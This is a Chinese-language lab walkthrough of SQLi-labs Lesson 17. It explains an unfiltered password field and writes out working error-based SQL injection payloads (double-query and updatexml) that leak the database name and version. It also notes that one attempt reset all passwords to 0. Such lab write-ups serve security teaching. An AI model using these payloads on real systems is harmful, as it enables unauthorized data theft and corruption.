SQLi Labs Lesson17

Lesson - 17

Update Query - Error Based - String

首先进入欢迎界面：

本页面的作用是重置用户的密码。

本节对注入有过滤。

function check_input($value)
{
	if(!empty($value))
	{
		// truncation (see comments)
		$value = substr($value,0,15);
	}

	// Stripslashes if magic quotes enabled
	if (get_magic_quotes_gpc())
	{
		$value = stripslashes($value);
	}

	// Quote if not a number
	if (!ctype_digit($value))
	{
		$value = "'" . mysql_real_escape_string($value) . "'";
	}
	else
	{
		$value = intval($value);
	}
return $value;
}

该函数的作用：

1.首先对参数$value只取前16个字符。

2.magic_quotes_gpc()函数在php中的作用是判断解析用户提示的数据，如包括有：post、get、cookie过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符引起的污染而出现致命的错误 。

在magic_quotes_gpc=On的情况下，如果输入的数据有单引号（’）、双引号（”）、反斜线（）与 NUL（NULL 字符）等字符都会被加上反斜线。这些转义是必须的，如果这个选项为off，那么我们就必须调用addslashes这个函数来为字符串增加转义。

3.ctype_digit函数做纯数字检测。

具体见 http://php.net/manual/zh/ref.ctype.php

mysql_real_escape_string — 转义 SQL 语句中使用的字符串中的特殊字符，并考虑到连接的当前字符集 。

具体见 http://php.net/manual/zh/function.mysql-real-escape-string.php

intval — 获取变量的整数值

具体见 http://php.net/manual/zh/function.intval.php

后台php只对username进行了过滤，没有对password进行过滤。

$uname=check_input($_POST['uname']);  

$passwd=$_POST['passwd'];

所以可以利用password进行注入：

利用Lesson-5中的Double Injection:

(查看后台php源代码，可以看到，只有当用户名存在时才进行密码重置，所以利用password注入时，必须事先知道一个存在的用户名，这里用admin）

构造表单：

username为：admin

password为：foo' and (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1) #

点击submit后，不管刷新多少次，发现均没有报错，更别说报出数据库名。

通过phpmyadmiin查看发现，users表中的所有user的password均变为0。

重新构造表单：

username为：admin

password为：1' and (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1) #

点击Submit，刷新几次后得到：

还有一种注入的方法，利用updatexml()函数。

重新构造表单：

username为：admin

password为：1' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#

（0x7e为‘~’）

结果如图所示：

关于UpdateXML(xml_target, xpath_expr, new_xml)函数：

Description:
Syntax:
UpdateXML(xml_target, xpath_expr, new_xml)

This function replaces a single portion of a given fragment of XML
markup xml_target with a new XML fragment new_xml, and then returns the
changed XML. The portion of xml_target that is replaced matches an
XPath expression xpath_expr supplied by the user. In MySQL 5.6.6 and
earlier, the XPath expression could contain at most 127 characters.
This limitation is lifted in MySQL 5.6.7. (Bug #13007062, Bug #62429)

If no expression matching xpath_expr is found, or if multiple matches
are found, the function returns the original xml_target XML fragment.
All three arguments should be strings.

URL: http://dev.mysql.com/doc/refman/5.6/en/xml-functions.html

Examples:
mysql> SELECT
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/b', '<e>fff</e>') AS val2,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '//b', '<e>fff</e>') AS val3,
    ->   UpdateXML('<a><b>ccc</b><d></d></a>', '/a/d', '<e>fff</e>') AS val4,
    ->   UpdateXML('<a><d></d><b>ccc</b><d></d></a>', '/a/d', '<e>fff</e>') AS val5
    -> \G

*************************** 1. row ***************************
val1: <e>fff</e>
val2: <a><b>ccc</b><d></d></a>
val3: <a><e>fff</e><d></d></a>
val4: <a><b>ccc</b><e>fff</e></a>
val5: <a><d></d><b>ccc</b><d></d></a>